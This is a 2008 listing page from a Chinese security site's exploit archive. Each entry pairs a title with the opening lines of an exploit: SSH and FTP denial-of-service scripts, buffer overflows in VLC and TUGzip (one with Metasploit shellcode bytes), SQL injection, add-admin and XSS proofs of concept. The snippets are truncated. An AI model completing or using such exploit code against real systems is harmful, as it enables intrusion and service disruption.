首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
vicFTP 5.0 (LIST) Remote Denial of Service Exploit
  日期:2008-10-27 11:22:09 点击:39 评论:0
#include cstdio #include winsock2.h #include memory.h #define __z00ro(a) memset(a,0,sizeof(a)); //greetings : SiD.psycho //Smallest greetings : Gorion - lofamy cIem We want be like y0U :*** unsigned int setport(const char* port){ if((atoi(port)==0) |
KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
  日期:2008-10-27 11:21:36 点击:40 评论:0
!-- KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC a
TUGzip 3.00 archiver .ZIP File Local Buffer Overflow Exploit
  日期:2008-10-27 11:19:55 点击:34 评论:0
/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa(JK) Well hello there ,greetz from Romania,here is a exploit fo
db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities
  日期:2008-10-27 11:18:58 点击:50 评论:0
----------------------------------------------------------------------------- db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities url: http://www.dbsoftlab.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai
MS08066本地权限提升漏洞exploit
  日期:2008-10-24 14:01:37 点击:549 评论:0
#Thanks to SoBeIt #Original URL:http://www.whitecell.org/forums/viewthread.php?tid=796 #include stdio.h #include winsock2.h #include windows.h #pragma comment(lib, ws2_32.lib) #define NTSTATUS int typedef struct _PROCESS_BASIC_INFORMATION { NTSTATUS
VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)
  日期:2008-10-24 13:29:21 点击:48 评论:0
#!/usr/bin/perl # 10/23/2008 k`sOSe # Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit # 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k) # 2 - Works both with a local file and with a remote url # 3 - VLC do not crash! # 4 - Enjoy a res
CSSH is a proof of concept CSS based history crawler
  日期:2008-10-24 11:31:44 点击:46 评论:0
?php/***** BEGIN LICENSE BLOCK *****CSSH - a proof of concept CSS based history crawlerCopyright (C) 2008 SirdarckcatThis program is free software; you can redistribute it and/or modifyit under the terms of the GNU General Public License as publishe
MindDezign Photo Gallery 2.2 Arbitrary Add Admin Exploit
  日期:2008-10-24 11:30:02 点击:33 评论:0
#!/usr/bin/perl #============================================================= # MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit #============================================================= # ,--^----------,--------,-----,-------^--, # | |
SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit
  日期:2008-10-24 11:29:25 点击:38 评论:0
#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # SilverSHielD 1.0.2.34 DoS use Net::SSH2; $host = 192.168.0.111; $port = 22; $username = test; $password = test123; $dos = ; $ssh2 = Net::SSH2-new(); $ssh2-connect($host, $
CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
  日期:2008-10-24 11:28:12 点击:50 评论:0
?php /* CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit ---------------------------------------------------------------- By StAkeR[at]hotmail[dot]it http://www.easy-script.com/scripts-dl/cspartne-01.zip ---------------------------------
Opera 9.52/9.60 Stored Cross Site Scripting Code Exec PoC
  日期:2008-10-24 11:25:55 点击:117 评论:0
!-- Just found a way to use Stefanos opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to \evilmalware.exe , or to local commands (e.g. ftp.exe which can
Exploits Asterisk 1.4,1.6 et. al. Resource Exhaustion
  日期:2008-10-24 11:23:48 点击:42 评论:0
#!/usr/bin/perl -w #copywrite Blake Cornell # http://www.securityscraper.com/ # for more info #Asterisk 1.4,1.6 et. al. # Resource Exhaustion # Asterisk cannot recover #goto http://www.voip0day.com for more information use strict; use IO::Socket; us
LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)
  日期:2008-10-23 14:54:08 点击:46 评论:0
#!/usr/bin/perl # This Exploit requires a valid user name and password of an account regardless of the permissions # # Author: Xianur0 # Affected: All Versions # Bug: SQL Injection # # Doorks: # allintext: powered by LoudBlog use HTTP::Request::Commo
LibSPF2 < 1.2.8 DNS TXT Record Parsing Bug Heap Overflow PoC
  日期:2008-10-23 14:53:08 点击:70 评论:0
Advisory: DNS TXT Record Parsing Bug in LibSPF2 Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, Dan.Kaminsky@ioactive.com (PGP Key In Appendix) Abstract: A relatively common bug parsing TXT records delivered over DNS, dating at l
GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
  日期:2008-10-23 14:41:25 点击:36 评论:0
# GoodTech SSH Remote Buffer Overflow Exploit # Written by r0ut3r - writ3r [at] gmail.com # # SSH_FXP_OPEN command contains a buffer oveflow. # # All other operations are also vulnerable, opendir, unlink, etc. # # 0day for 2 months :) use Net::SSH2;
FreeSSH version 1.2.1 denial of service exploit. Crash #2
  日期:2008-10-23 11:26:26 点击:47 评论:0
#!/usr/bin/perl# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.use Net::SSH2;$host = 192.168.0.100;$port = 22;$username = test;$password = test;$dos = A x 262145;$ssh2
Opera <= 9.60 Stored Cross Site Scripting Vulnerability
  日期:2008-10-23 11:10:27 点击:42 评论:0
======================================================================= = Opera Stored Cross Site Scripting Vulnerability = = Vendor Website: = http://www.opera.com = = Affected Version: = -- All desktop versions = = Public disclosure on 22nd October
freeSSHd 1.2.1 sftp rename Remote Crash Exploit
  日期:2008-10-23 11:09:47 点击:71 评论:0
#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned. use Net::SSH2; $host = 192.168.0.187; $port = 22; $username = test; $password = test; $dos = A x 550000; $ssh2 = N
Google-php-include-bugs searcher v 0.8
  日期:2008-10-23 11:08:28 点击:37 评论:0
perl # ================================================================ # # Google-php-include-bugs searcher v 0.8 # # (c)oded by drmistSTNC # # www.security-teams.net # # # # ATTENTION. THIS SCRIPT IS PRIVATE. # # ONLY FOR STNC AND FRIENDS. NOT FO
VLC Media Player TY File Stack Based Buffer Overflow Exploit
  日期:2008-10-22 10:19:45 点击:54 评论:0
#!/usr/bin/perl # 10/21/2008 k`sOSe use warnings; use strict; # windows/exec - 141 bytes # http://www.metasploit.com my $shellcode = xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01 . xefx8bx4fx18x8bx5fx20x01xebx49x8bx34x8bx01 .
共637页/12733条记录 首页 上一页 [502] [503] [504] 505 [506] [507] [508] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved